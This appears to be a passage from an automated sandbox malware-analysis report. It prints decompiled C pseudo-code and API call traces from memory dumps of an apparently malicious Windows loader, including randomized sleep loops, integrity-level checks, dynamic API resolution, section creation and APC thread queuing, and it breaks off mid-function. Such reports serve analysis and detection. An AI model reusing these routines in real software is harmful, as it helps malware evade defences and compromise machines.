							_t68 = E00BB86F0(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0xbbd260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E00BB9958(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E00BBA79A(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0xbbd244);
							goto L21;
						} else {
							__eflags =  *0xbbd248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E00BB14EF();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0xbbd248);
								L21:
								L00BBB088();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0xbbd238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x00bb7780
0x00bb7792
0x00bb7795
0x00bb77a1
0x00bb77a7
0x00bb77ac
0x00bb7913
0x00bb77b2
0x00bb77b2
0x00bb77b4
0x00bb77b9
0x00bb77ba
0x00bb77c0
0x00bb77c3
0x00bb77c6
0x00bb77d4
0x00bb77df
0x00bb77e2
0x00bb77e4
0x00bb77f1
0x00bb77fb
0x00bb77fd
0x00bb7802
0x00bb7807
0x00bb7812
0x00bb7812
0x00bb7809
0x00bb7809
0x00bb7810
0x00000000
0x00000000
0x00bb7810
0x00bb781c
0x00000000
0x00bb781f
0x00bb7823
0x00bb782e
0x00bb782e
0x00bb7835
0x00bb783e
0x00bb7845
0x00bb784e
0x00bb7851
0x00bb7854
0x00bb7859
0x00bb785e
0x00000000
0x00000000
0x00bb7860
0x00bb7863
0x00bb7866
0x00bb7869
0x00000000
0x00bb786b
0x00bb787a
0x00bb787a
0x00000000
0x00bb78a8
0x00bb78a8
0x00bb78ad
0x00bb78cc
0x00bb78ce
0x00bb78d3
0x00bb78d4
0x00000000
0x00bb78af
0x00bb78af
0x00bb78b5
0x00000000
0x00bb78b7
0x00bb78b7
0x00bb78bc
0x00bb78be
0x00bb78c3
0x00bb78c4
0x00bb78da
0x00bb78da
0x00bb78e2
0x00bb78ed
0x00bb78f0
0x00bb78fb
0x00bb78fd
0x00bb7900
0x00bb7902
0x00000000
0x00bb7908
0x00000000
0x00bb7908
0x00bb7902
0x00bb78b5
0x00000000
0x00bb78ad
0x00bb787d
0x00bb787f
0x00bb7882
0x00bb7883
0x00bb7883
0x00bb7887
0x00bb7891
0x00bb7891
0x00bb7897
0x00bb789a
0x00bb789a
0x00bb78a0
0x00bb78a0
0x00bb791d
0x00000000

APIs

memset.NTDLL ref: 00BB7795
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00BB77A1
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 00BB77C6
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00BB77E2
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00BB77FB
HeapFree.KERNEL32(00000000,00000000), ref: 00BB7891
CloseHandle.KERNEL32(?), ref: 00BB78A0
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00BB78DA
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00BB19AA,?), ref: 00BB78F0
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00BB78FB

Part of subcall function 00BB86F0: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03619388,00000000,?,74B5F710,00000000,74B5F730), ref: 00BB873F
Part of subcall function 00BB86F0: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,036193C0,?,00000000,30314549,00000014,004F0053,0361937C), ref: 00BB87DC
Part of subcall function 00BB86F0: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00BB780E), ref: 00BB87EE

GetLastError.KERNEL32 ref: 00BB790D

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: 095f8fc4eb0b5a09a8857c9af1f787ca9d835dc59df5bb961e919794e62e4cf3
Instruction ID: f0085cdcba6937400c5dc7e9c4e2ef354af77a878b2ec3cbc59235dc371b6ab3
Opcode Fuzzy Hash: 095f8fc4eb0b5a09a8857c9af1f787ca9d835dc59df5bb961e919794e62e4cf3
Instruction Fuzzy Hash: CD513C71805228ABCF11EF95DC48DFEBFB8EF49720F204665F515A3190DBB48A44DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E0C1D6E, Relevance: 15.1, APIs: 10, Instructions: 98
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E6E0C1D6E(char _a4) {
				long _v8;
				struct _SYSTEMTIME _v24;
				char _v48;
				void* __edi;
				long _t20;
				int _t22;
				long _t25;
				long _t26;
				long _t30;
				void* _t36;
				intOrPtr _t38;
				intOrPtr _t43;
				signed int _t44;
				void* _t48;
				signed int _t51;
				void* _t54;
				intOrPtr* _t55;

				_t20 = E6E0C1800();
				_v8 = _t20;
				if(_t20 != 0) {
					return _t20;
				}
				do {
					GetSystemTime( &_v24);
					_t22 = SwitchToThread();
					asm("cdq");
					_t44 = 9;
					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
					_t25 = E6E0C1C4E(0, _t51); // executed
					_v8 = _t25;
					Sleep(_t51 << 5); // executed
					_t26 = _v8;
				} while (_t26 == 0xc);
				if(_t26 != 0) {
					L18:
					return _t26;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t54 = E6E0C1F56(E6E0C1718,  &_v48);
					if(_t54 == 0) {
						_v8 = GetLastError();
					} else {
						_t30 = WaitForSingleObject(_t54, 0xffffffff);
						_v8 = _t30;
						if(_t30 == 0) {
							GetExitCodeThread(_t54,  &_v8);
						}
						CloseHandle(_t54);
					}
					_t26 = _v8;
					if(_t26 == 0xffffffff) {
						_t26 = GetLastError();
					}
					goto L18;
				}
				if(E6E0C12E5(_t44,  &_a4) != 0) {
					 *0x6e0c4138 = 0;
					goto L11;
				}
				_t43 = _a4;
				_t55 = __imp__GetLongPathNameW;
				_t36 =  *_t55(_t43, 0, 0); // executed
				_t48 = _t36;
				if(_t48 == 0) {
					L9:
					 *0x6e0c4138 = _t43;
					goto L11;
				}
				_t14 = _t48 + 2; // 0x2
				_t38 = E6E0C1072(_t48 + _t14);
				 *0x6e0c4138 = _t38;
				if(_t38 == 0) {
					goto L9;
				}
				 *_t55(_t43, _t38, _t48); // executed
				E6E0C105D(_t43);
				goto L11;
			}

0x6e0c1d75
0x6e0c1d7c
0x6e0c1d81
0x6e0c1e71
0x6e0c1e71
0x6e0c1d88
0x6e0c1d8c
0x6e0c1d92
0x6e0c1da0
0x6e0c1da1
0x6e0c1da4
0x6e0c1da7
0x6e0c1db0
0x6e0c1db3
0x6e0c1db9
0x6e0c1dbc
0x6e0c1dc3
0x6e0c1e6e
0x00000000
0x6e0c1e6e
0x6e0c1dcd
0x6e0c1e1e
0x6e0c1e1e
0x6e0c1e34
0x6e0c1e39
0x6e0c1e61
0x6e0c1e3b
0x6e0c1e3e
0x6e0c1e44
0x6e0c1e49
0x6e0c1e50
0x6e0c1e50
0x6e0c1e57
0x6e0c1e57
0x6e0c1e64
0x6e0c1e6a
0x6e0c1e6c
0x6e0c1e6c
0x00000000
0x6e0c1e6a
0x6e0c1dda
0x6e0c1e18
0x00000000
0x6e0c1e18
0x6e0c1ddc
0x6e0c1ddf
0x6e0c1de8
0x6e0c1dea
0x6e0c1dee
0x6e0c1e10
0x6e0c1e10
0x00000000
0x6e0c1e10
0x6e0c1df0
0x6e0c1df5
0x6e0c1dfa
0x6e0c1e01
0x00000000
0x00000000
0x6e0c1e06
0x6e0c1e09
0x00000000

APIs

Part of subcall function 6E0C1800: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E0C1D7A,74B063F0), ref: 6E0C180F
Part of subcall function 6E0C1800: GetVersion.KERNEL32 ref: 6E0C181E
Part of subcall function 6E0C1800: GetCurrentProcessId.KERNEL32 ref: 6E0C183A
Part of subcall function 6E0C1800: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E0C1853

GetSystemTime.KERNEL32(?,00000000,74B063F0), ref: 6E0C1D8C
SwitchToThread.KERNEL32 ref: 6E0C1D92

Part of subcall function 6E0C1C4E: VirtualAlloc.KERNELBASE(00000000,6E0C1DAC,00003000,00000004,?,?,6E0C1DAC,00000000), ref: 6E0C1CA4
Part of subcall function 6E0C1C4E: memcpy.NTDLL(?,?,6E0C1DAC,?,?,6E0C1DAC,00000000), ref: 6E0C1D3B
Part of subcall function 6E0C1C4E: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,6E0C1DAC,00000000), ref: 6E0C1D56

Sleep.KERNELBASE(00000000,00000000), ref: 6E0C1DB3
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E0C1DE8
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E0C1E06
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 6E0C1E3E
GetExitCodeThread.KERNEL32(00000000,?), ref: 6E0C1E50
CloseHandle.KERNEL32(00000000), ref: 6E0C1E57
GetLastError.KERNEL32(?,00000000), ref: 6E0C1E5F
GetLastError.KERNEL32 ref: 6E0C1E6C

Memory Dump Source

Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
String ID:
API String ID: 2280543912-0
Opcode ID: 45cca0821cae5d9d007321f6ad584a0eddd25e94eb50e80913b7cfa44a547786
Instruction ID: bfe9e3664e19f775661fb591bbe2e7fc2463378abd4d40db8c3616211e8ab59a
Opcode Fuzzy Hash: 45cca0821cae5d9d007321f6ad584a0eddd25e94eb50e80913b7cfa44a547786
Instruction Fuzzy Hash: D3318676910615BBCB01DBF58C5CA9F76FDAF4AF507200552F914D3148E734DA088B62

Uniqueness

Uniqueness Score: -1.00%

Function 00BB165F, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00BB165F(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L00BBB082();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0xbbd2a4; // 0x2a5a5a8
				_t5 = _t13 + 0xbbe862; // 0x3618e0a
				_t6 = _t13 + 0xbbe59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L00BBAD1A();
				_t17 = CreateFileMappingW(0xffffffff, 0xbbd2a8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x00bb165f
0x00bb1667
0x00bb166b
0x00bb1671
0x00bb1676
0x00bb167b
0x00bb167e
0x00bb1681
0x00bb1686
0x00bb1687
0x00bb168a
0x00bb168f
0x00bb1696
0x00bb16a0
0x00bb16a2
0x00bb16a3
0x00bb16a6
0x00bb16c2
0x00bb16c8
0x00bb16cc
0x00bb171a
0x00bb16ce
0x00bb16db
0x00bb16eb
0x00bb16f3
0x00bb1705
0x00bb1709
0x00000000
0x00000000
0x00bb16f5
0x00bb16f8
0x00bb16fd
0x00bb16ff
0x00bb16ff
0x00bb16dd
0x00bb16df
0x00bb170b
0x00bb170c
0x00bb170c
0x00bb16db
0x00bb1721

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00BB187D,?,?,4D283A53,?,?), ref: 00BB166B
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00BB1681
_snwprintf.NTDLL ref: 00BB16A6
CreateFileMappingW.KERNELBASE(000000FF,00BBD2A8,00000004,00000000,00001000,?), ref: 00BB16C2
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00BB187D,?,?,4D283A53), ref: 00BB16D4
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00BB16EB
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00BB187D,?,?), ref: 00BB170C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00BB187D,?,?,4D283A53), ref: 00BB1714

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: 9e2a53a3ec7aac5f06939f392bd5a432b996cbfba3baaa92cc77e6d2a6a40683
Instruction ID: e75fc136c066b9c4baf1defde55dfff1101a262b28a3183fe3554eb1cfdeee38
Opcode Fuzzy Hash: 9e2a53a3ec7aac5f06939f392bd5a432b996cbfba3baaa92cc77e6d2a6a40683
Instruction Fuzzy Hash: F9218176640204BBD711EFA9CC59FEA7BE9EB44710F6502A1F505E7190DBF0DA058B50

Uniqueness

Uniqueness Score: -1.00%

Function 00BB21C5, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BB21C5(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0xbbd25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E00BB98E4(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00BB5DE8(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x00bb21d2
0x00bb21d9
0x00bb21e0
0x00bb21f4
0x00bb21ff
0x00bb2217
0x00bb2224
0x00bb2227
0x00bb222c
0x00bb2237
0x00bb223b
0x00bb224a
0x00bb224e
0x00bb226a
0x00bb226a
0x00bb226e
0x00bb226e
0x00bb2273
0x00bb2277
0x00bb227d
0x00bb227e
0x00bb2285
0x00bb228b

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00BB21F7
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 00BB2217
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00BB2227
CloseHandle.KERNEL32(00000000), ref: 00BB2277

Part of subcall function 00BB98E4: RtlAllocateHeap.NTDLL(00000000,00000000,00BB6788), ref: 00BB98F0

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 00BB224A
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00BB2252
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00BB2262

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 65756847adeca8899d8954971133a947bf7e623221dcbd3dba00b019e24f1a15
Instruction ID: 0a7ac7a0ed2624fb071b896dac740f59aba13c697aec668f8d60ef4bf4147e3d
Opcode Fuzzy Hash: 65756847adeca8899d8954971133a947bf7e623221dcbd3dba00b019e24f1a15
Instruction Fuzzy Hash: A0212A7590424DFFEF01AFA4DC44EEEBBB9EB48304F1001A5E910A6261DBB58E45EF60

Uniqueness

Uniqueness Score: -1.00%

Function 6E0C1879, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E0C1879(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6E0C1072(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6e0c4144 + 0x6e0c5014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6e0c4144 + 0x6e0c5151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6E0C105D(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6e0c4144 + 0x6e0c5161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6e0c4144 + 0x6e0c5174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6e0c4144 + 0x6e0c5189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6e0c4144 + 0x6e0c519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6E0C145E(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x6e0c1887
0x6e0c188b
0x6e0c194c
0x6e0c1891
0x6e0c18a9
0x6e0c18b8
0x6e0c18bf
0x6e0c18c1
0x6e0c18c6
0x6e0c1944
0x6e0c1945
0x6e0c18c8
0x6e0c18d5
0x6e0c18d7
0x6e0c18dc
0x00000000
0x6e0c18de
0x6e0c18eb
0x6e0c18ed
0x6e0c18f2
0x00000000
0x6e0c18f4
0x6e0c1901
0x6e0c1903
0x6e0c1908
0x00000000
0x6e0c190a
0x6e0c1917
0x6e0c1919
0x6e0c191e
0x00000000
0x6e0c1920
0x6e0c1926
0x6e0c192c
0x6e0c1931
0x6e0c1936
0x6e0c193b
0x00000000
0x6e0c193d
0x6e0c1940
0x6e0c1940
0x6e0c193b
0x6e0c191e
0x6e0c1908
0x6e0c18f2
0x6e0c18dc
0x6e0c18c6
0x6e0c195a

APIs

Part of subcall function 6E0C1072: HeapAlloc.KERNEL32(00000000,?,6E0C1303,00000208,00000000,00000000,?,?,?,6E0C1DD8,?), ref: 6E0C107E

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E0C1B92,?,?,?,?,?,00000002,?,?), ref: 6E0C189D
GetProcAddress.KERNEL32(00000000,?), ref: 6E0C18BF
GetProcAddress.KERNEL32(00000000,?), ref: 6E0C18D5
GetProcAddress.KERNEL32(00000000,?), ref: 6E0C18EB
GetProcAddress.KERNEL32(00000000,?), ref: 6E0C1901
GetProcAddress.KERNEL32(00000000,?), ref: 6E0C1917

Part of subcall function 6E0C145E: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000), ref: 6E0C14BB
Part of subcall function 6E0C145E: memset.NTDLL ref: 6E0C14DD

Memory Dump Source

Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: e62607ebb55268dfb7771406d647a69c46022955586fa3a1c9ace71c9acdf1bb
Instruction ID: cde3a2532a3aa305811328bc36634633be91429de1acccc8982895b1abe8356b
Opcode Fuzzy Hash: e62607ebb55268dfb7771406d647a69c46022955586fa3a1c9ace71c9acdf1bb
Instruction Fuzzy Hash: 14217FB5600A4BAFDB11DFAAC854E9EB7FCFF45B507004425E989D7210E770E909CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6E0C1E74, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6e0c4108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6e0c410c;
						if( *0x6e0c410c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6e0c4118;
								if( *0x6e0c4118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6e0c410c);
						}
						HeapDestroy( *0x6e0c4110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6e0c4108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x6e0c4110 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6e0c4130 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6E0C1F56(E6E0C1367, E6E0C1BFA(_a12, 1, 0x6e0c4118, _t41));
							 *0x6e0c410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x6e0c1e77
0x6e0c1e83
0x6e0c1e85
0x6e0c1e88
0x6e0c1efe
0x6e0c1f04
0x6e0c1f06
0x6e0c1f08
0x6e0c1f0e
0x6e0c1f10
0x6e0c1f15
0x6e0c1f18
0x6e0c1f23
0x6e0c1f25
0x00000000
0x00000000
0x6e0c1f27
0x6e0c1f2a
0x6e0c1f2c
0x00000000
0x00000000
0x00000000
0x6e0c1f2c
0x6e0c1f34
0x6e0c1f34
0x6e0c1f40
0x6e0c1f40
0x6e0c1e8a
0x6e0c1e8b
0x6e0c1eab
0x6e0c1eb1
0x6e0c1eb6
0x6e0c1eb8
0x6e0c1ef4
0x6e0c1ef4
0x6e0c1eba
0x6e0c1ec2
0x6e0c1ec9
0x6e0c1ed3
0x6e0c1edf
0x6e0c1ee4
0x6e0c1eeb
0x6e0c1ef0
0x00000000
0x6e0c1ef0
0x6e0c1eeb
0x6e0c1eb8
0x6e0c1e8b
0x6e0c1f4d

APIs

InterlockedIncrement.KERNEL32(6E0C4108), ref: 6E0C1E96
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E0C1EAB

Part of subcall function 6E0C1F56: CreateThread.KERNELBASE ref: 6E0C1F6D
Part of subcall function 6E0C1F56: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E0C1F82
Part of subcall function 6E0C1F56: GetLastError.KERNEL32(00000000), ref: 6E0C1F8D
Part of subcall function 6E0C1F56: TerminateThread.KERNEL32(00000000,00000000), ref: 6E0C1F97
Part of subcall function 6E0C1F56: CloseHandle.KERNEL32(00000000), ref: 6E0C1F9E
Part of subcall function 6E0C1F56: SetLastError.KERNEL32(00000000), ref: 6E0C1FA7

InterlockedDecrement.KERNEL32(6E0C4108), ref: 6E0C1EFE
SleepEx.KERNEL32(00000064,00000001), ref: 6E0C1F18
CloseHandle.KERNEL32 ref: 6E0C1F34
HeapDestroy.KERNEL32 ref: 6E0C1F40

Memory Dump Source

Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: df78204875317c442a16d1c6f9ab47c71a4fbfe9b766fc6b6de8410e8299bd90
Instruction ID: fe9ef626e04289eb8fb1dc4ff98ef055fccf1420dbad2fbe1d06063b94ff5717
Opcode Fuzzy Hash: df78204875317c442a16d1c6f9ab47c71a4fbfe9b766fc6b6de8410e8299bd90
Instruction Fuzzy Hash: BB216D32A10605BFCB409FE98C8CA4E3BB8F75AFA47204465FA59E3240D734894B8B52

Uniqueness

Uniqueness Score: -1.00%

Function 00BBA1E3, Relevance: 9.1, APIs: 6, Instructions: 60
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00BBA1E3(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0xbbd238 = _t10;
				if(_t10 != 0) {
					 *0xbbd1a8 = GetTickCount();
					_t12 = E00BB12ED(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L00BBB1E6();
							_t33 = _t14 + _t16;
							_t18 = E00BB673B(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
